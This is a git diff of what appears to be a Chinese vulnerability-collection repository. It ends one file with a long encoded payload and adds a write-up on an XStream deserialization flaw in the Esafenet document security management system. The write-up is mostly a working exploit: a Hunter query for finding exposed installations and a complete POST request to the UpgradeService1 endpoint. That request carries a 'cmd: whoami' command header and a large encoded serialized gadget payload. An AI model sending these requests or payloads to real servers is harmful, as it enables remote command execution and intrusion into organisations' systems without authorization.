CCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606127067-5ca612a6-89c4-49ce-9b8e-8a9d8ea6453d.png](./img/uoP4yQeuB8LIwH0S/1706606127067-5ca612a6-89c4-49ce-9b8e-8a9d8ea6453d-031748.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/snk1s63y86e5ciig>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UpgradeService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpgradeService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..c899510
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UpgradeService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统UpgradeService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统UpgradeService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/sdMScspjjjqriDzh/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-945704.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/UpgradeService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEB